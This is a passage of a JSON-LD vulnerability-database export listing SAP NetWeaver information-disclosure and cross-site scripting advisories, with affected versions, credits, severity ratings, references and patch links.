"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitriy Chastuchin, Digital Security Research Group",
"sources": [
{
"db": "BID",
"id": "49655"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nSuccessful exploits will allow attackers to obtain sensitive information that may aid in further attacks.",
"sources": [
{
"db": "BID",
"id": "49655"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "49655",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "49655"
}
]
},
"id": "VAR-201109-0445",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:00:11.088000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=332"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1545883"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "49655"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "49655"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-09-15T00:00:00",
"db": "BID",
"id": "49655"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-09-15T00:00:00",
"db": "BID",
"id": "49655"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "49655"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "49655"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "49655"
}
],
"trust": 0.3
}
}
var-201301-0498
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver J2EE AdapterFramework Servlet has an unspecified error that allows an attacker to exploit the vulnerability to obtain SAP versions and other sensitive information. SAP NetWeaver is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201301-0498",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web application server",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0.10"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.01*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
}
],
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "57656"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP NetWeaver J2EE AdapterFramework Servlet has an unspecified error that allows an attacker to exploit the vulnerability to obtain SAP versions and other sensitive information. SAP NetWeaver is prone to an information-disclosure vulnerability. \nAn attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
},
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57656",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-00690",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621",
"trust": 0.6
},
{
"db": "IVD",
"id": "592CD0A0-1F39-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
]
},
"id": "VAR-201301-0498",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
}
],
"trust": 1.2326165966666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
}
]
},
"last_update_date": "2022-05-17T01:46:36.984000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver J2EE AdapterFramework Servlet Information Disclosure Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/31379"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00690"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/dsecrg-12-050-sap-netweaver-adapterframework-information-disclosure/http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/57656"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-050-sap-netweaver-adapterframework-information-disclosure/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-04T00:00:00",
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"date": "2013-01-31T00:00:00",
"db": "BID",
"id": "57656"
},
{
"date": "2013-01-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"date": "2013-01-31T00:00:00",
"db": "BID",
"id": "57656"
},
{
"date": "2013-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver J2EE AdapterFramework Servlet Information Disclosure Vulnerability",
"sources": [
{
"db": "IVD",
"id": "592cd0a0-1f39-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-00690"
},
{
"db": "BID",
"id": "57656"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
],
"trust": 1.7
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-621"
}
],
"trust": 0.6
}
}
var-201709-1267
Vulnerability from variot
SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1267",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100798"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100798"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "100798"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100798",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100798"
}
]
},
"id": "VAR-201709-1267",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:46:24.784000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2444673"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100798"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100798"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100798"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100798"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100798"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "100798"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100798"
}
],
"trust": 0.3
}
}
var-201106-0307
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Inputs passed to the Deployer servlet in the Trust Center service via the \"BSNAME\" and \"REQID\" parameters are not filtered before returning to the user, which can lead to cross-site scripting attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201106-0307",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Inputs passed to the Deployer servlet in the Trust Center service via the \\\"BSNAME\\\" and \\\"REQID\\\" parameters are not filtered before returning to the user, which can lead to cross-site scripting attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2387"
},
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-2387",
"trust": 0.8
},
{
"db": "IVD",
"id": "C05B8E4E-1F91-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"id": "VAR-201106-0307",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"last_update_date": "2022-05-17T02:03:34.573000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver \u0027Deployer servlet\u0027 enters patches for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4228"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=325"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2387"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
